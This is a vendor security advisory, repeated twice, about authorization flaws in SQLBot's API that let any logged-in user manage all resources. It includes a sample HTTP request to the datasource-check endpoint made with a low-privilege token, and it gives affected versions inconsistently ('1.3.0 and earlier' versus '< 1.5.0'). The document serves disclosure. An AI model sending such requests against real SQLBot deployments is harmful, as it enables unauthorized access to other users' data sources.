Impact
SQLBot versions 1.3.0 and earlier contained multiple authorization vulnerabilities in the API, allowing any authenticated user to perform create, read, update, and delete operations on all resources within SQLBot.
POC
- Deploy SQLBot application
- Login as a low-privileged user and obtain a valid x-sqlbot-token
Take the data source-related API interfaces as an example.
Check Datasource Connection (POST /datasource/check)
POST /api/v1/datasource/check HTTP/1.1
Host: target-server
Content-Type: application/json
x-sqlbot-token: <valid_user_token>
{
"id": 1,
"name": "test",
"type": "postgresql",
"host": "localhost",
"port": 5432,
"database": "test",
"username": "admin",
"password": "password"
}
Result: Checks datasource connection without authorization check.
Affected versions: < 1.5.0
Justification for Single CVE Assignment
According to CVE CNA Rule 4.2.11 (Independently Fixable Vulnerabilities), this advisory requests a single CVE ID because the listed vulnerabilities are NOT independently fixable, for the following reasons:
-
Shared Root Cause: All vulnerabilities stem from the same core design flaw — specifically, the lack of input validation and session token verification. Fixing one vulnerability requires addressing the root cause, which inherently resolves all other listed vulnerabilities.
-
Unified Fix Implementation: The only viable fix for these vulnerabilities is a single code change — there is no way to fix one vulnerability without simultaneously fixing all others.
-
Dependent Impact: The exploitation of one vulnerability is a prerequisite for exploiting the other — they do not represent separate, isolated security risks to end users.
Patches
The vulnerability has been fixed in v1.5.0.
Workarounds
It is recommended to upgrade the version to v1.5.0.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/sqlbot
Email us at wei@fit2cloud.com
Impact
SQLBot versions 1.3.0 and earlier contained multiple authorization vulnerabilities in the API, allowing any authenticated user to perform create, read, update, and delete operations on all resources within SQLBot.
POC
Take the data source-related API interfaces as an example.
Check Datasource Connection (POST /datasource/check)
Result: Checks datasource connection without authorization check.
Affected versions: < 1.5.0
Justification for Single CVE Assignment
According to CVE CNA Rule 4.2.11 (Independently Fixable Vulnerabilities), this advisory requests a single CVE ID because the listed vulnerabilities are NOT independently fixable, for the following reasons:
Shared Root Cause: All vulnerabilities stem from the same core design flaw — specifically, the lack of input validation and session token verification. Fixing one vulnerability requires addressing the root cause, which inherently resolves all other listed vulnerabilities.
Unified Fix Implementation: The only viable fix for these vulnerabilities is a single code change — there is no way to fix one vulnerability without simultaneously fixing all others.
Dependent Impact: The exploitation of one vulnerability is a prerequisite for exploiting the other — they do not represent separate, isolated security risks to end users.
Patches
The vulnerability has been fixed in v1.5.0.
Workarounds
It is recommended to upgrade the version to v1.5.0.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/sqlbot
Email us at wei@fit2cloud.com